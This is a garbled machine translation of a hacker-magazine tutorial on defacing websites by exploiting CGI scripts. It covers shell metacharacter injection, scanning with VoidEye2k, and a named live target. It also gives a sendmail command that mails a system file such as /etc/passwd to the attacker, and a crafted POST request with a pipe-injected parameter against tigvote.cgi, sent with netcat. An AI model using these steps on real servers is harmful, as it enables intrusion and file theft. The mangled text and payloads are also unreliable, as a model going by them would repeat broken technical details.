Сух (обезобразяване) - хакерство и обезобразяване на сайтове -% ifth1% 0% -% ifen1% 0% - Издател - Личен сайт

Тук трябва да бъде постоянно, прочетете нашето списание (хакерски) и мисля: "И все пак, това не е за мен това е твърде сложно И това не е ясно ..." Но сега това е времето, когато ние ще ви кажа как можете бързо и без много напрежение, за да се прекъсне всякаква servak. Е, ние сме ви заинтригува? Ако отговорът е да, тогава четете нататък, нищо сложно в тази статия не е, и ако дори са леко да си представите колко сървъра е в ход, а малко по-запознат с C iliPerl, веднага ще се справи с всичко това и ще бъде истинско хладно haksorom.

Днес, неща, като например книги за гости, търсене на сървъра, формата за изпращане на съобщения - основен атрибут на почти всички големи сайт. Какво сериозно, сега дори и на начални страници се опитват да тъпча колкото е възможно всички видове въпросници, гласуване и т.н. ).

Да започнем с това, мисля, че е необходимо да се разбере концепцията (общо демонтаж и концепции - днес е много важно :). CGI-скрипт - програма, която се изпълнява на уеб-сървър по заявка на клиента. Клиент, както знаете - не е никой друг като теб). тази програма е фундаментално не се различава от обичайните програми, които са инсталирани на вашия компютър - независимо дали става дума Word или Quake. CGI - това не е език за програмиране на който е написан сценария и Common Gateway Interface - специален интерфейс, с помощта на която има един скрипт тичам и да си взаимодействат с него.

Как работи CGI-скрипт? Разбира се, мога да ви изстискайте малко техническо ръководство, но ползите от това няма да е достатъчно. Следователно, за да обясни как това се случи, на пръсти. Така страница посетител запълва поле на формуляр, например, да пише в книгата за гости. След това той кликне върху бутона "Изпращане" (или всеки друг, например, "Email"), който управлява CGI-скрипт. Сценарият изпълнява програмираните действия - в този случай, гласи данните от формата и ги пише в книгата за гости файл, - и да изпрати в браузъра си обикновен HTML-код, например, посланието: "Пич, ти си свободен Това е направено чака приятелката ..."

Ако се счупи нещо и делото отива в съда, ще се изправи:

1. непозволен достъп до защитени закон компютър информация, т.е. информацията върху носителя на машина, в електронен компютър (PC),

2. същото деяние, извършено от група лица, по предварително споразумение или организирана група или лице, което използва служебното си положение, както и да имат достъп до компютър, компютърна система или мрежа - се наказва с глоба от петстотин до осем сто пъти минималната работна заплата или заплата или друг доход за период от пет до осем месеца или поправителен труд за срок от една до две години, или лишаване от свобода за срок от три до шест месеца, или лишаване от свобода до пет литра а.

Общата цел на CGI-скриптове - за да ви позволи достъп само определена част от данните, съхранявани на сървъра. Това определение следва незабавно да ви отведе до идеята, че можете да по някакъв начин да получите достъп и до цялата информация на сървъра. Нито на сървъра не може да се счита за 100% сигурна (пауза и ***. Пра). Най-често срещаният уязвимостта - е липсата на проверки, изпратени до данните за Скриптът на мета-символи (като, например, как ; ` '" | *.

<> * () [] <> $), Което води до по-скрипт, или съдържанието на самия файл. Основно решение на този проблем, съществува набор филтрация вход характер, гледайки naPerl следва:

Мисля, че хората, които пишат скриптове - доста мързеливи и да забравите за нея или не искате да се помни, защото най-основният тест за героите "/" и ".." все още не, и след това, след като дойде на вашия сървър, вижте "] [/ - |

Сега мисля, че си малко да си представите на сървъра и на CGI-скриптове. Време е да ви обясня, че това се възползва. Употребява ( "проследяване" от английски "използва") - е уязвимост, за които проектирани специално метод за атака. Много подвизи са публикувани в открити източници, и рано или късно, за тях са "кръпки" (лепенки), премахване на уязвимостта. Да се надяваме, че администратора на сайта, който искате да се прекъсне, мързеливи и няма да слагам някакви петна. Трябва да кажа, че най-често срещаните грешки са:

1. Извършване на отбора.

3. Текущи програми.

4. Грешки Sendmail.

5. DoS атака по сценарий.

Грешка в Sendmail ще ви помогне да овладеете сървъра така.

Работещи Sendmail: Sendmail -f [email protected], Hi, pipiska.txt. Тази команда ще изпрати на моя сапун pipiska.txt файл. Естествено, вместо pipiska.txt по-добре да си поръчате файла / и т.н. / ако съществува :).

Така че, надявам се да са достатъчно подготвени теоретично и сега можете да направите нещо повече или по-малко полезни.

Първо, трябва да вземе решение за това дали имате нужда от него, или не? Ако е необходимо, изберете жертва, просто искам да предупредя: не се опитвайте да се прекъсне всякаква www.vvp.ru и www.nasa.gov, защото Катедра "P" в нашата страна не е заспал, а вие след това цялата вина върху мен :). Ако вече е бил избран на жертвата, а след това отиде и да свалите CGI-скенер. Ти не знаеш какво е това? След това трябва да Специална # 11 (22), където дадох сравнителен преглед на най-удобният и yuzaemyh CGI - проверка. Аз ще ви покажа всичко на VoidEye2k пример.

Така че, с настройките, които сами ще разберат, интерфейсът е ясно и бебето. Молим сървъра и изчакайте няколко минути). Така че, когато сканирате за www.kronex.ru намери tigvote.cgi скрипт. "Какво от това?" - вие казвате. А фактът, че в момента се движат по www.void.ru, гледам, когато статията "CGI-ZHUKS - подробно и на руски," и погледнете там експлоатират. четем:

Място: /cgi-bin/tigvote.cgi (точно там, където намерихме).

Този скрипт ви позволява да организирате гласуване на сайта, както и името на файла с базата данни на глас се предава на сценария, като параметър. Внимателно проучване на сорс кода на скрипта, можете да намерите място, където да чете данните от формулярите се е случило и възлагане на определена променлива име на файла:

Както можете да видите, няма проверка на различните герои, в това число | /. Преминавайки, виждаме линията Open File ", $ името на файла."; Няма стандартна обработка на низа премина, както и всички не-буквено-цифрови знаци се изпращат на uuencode, следователно, браузърът няма да може да извършва експлоатация на тази уязвимост.

По-долу е пример за заявка, която ще изпълни команда ехо Hi относно жертвата домакин. За да се даде такова искане може да бъде, например, netkatom (почти същия tOlnet):

[[email protected]] $ котка zapros
POST /cgi-bin/tigvote.cgi HTTP / 1.1
Accept: * / *
Accept-Language: RU
Content-Type: заявление / х-WWW-форма-urlencoded
Accept-Encoding: софтуерна изпуснете
User-Agent: Агент Смит
Водещ: www.kronex.ru
Content-Length: 33
Връзка: Дръжте-Alive
файл = коригират 777 * | tigvote = СНО + Здравейте
[[email protected]] $ NC www.victim.com out.log ".

Това е всичко;). Мислите си, че това е трудно? Оказва се, че няма място по-добре). Но имайте предвид, че броят на servakov с спукан скриптове намалява (имам предвид тези, които са servaki забавно да се прекъсне, не www.vasiapupkin.h1.ru).

Ако имате някакви допълнителни въпроси, моите сапуни са винаги отворени за вас.

Но сега това е времето, когато ние ще ви кажа как можете бързо и без много напрежение, за да се прекъсне всякаква servak.

п Тагил запознанства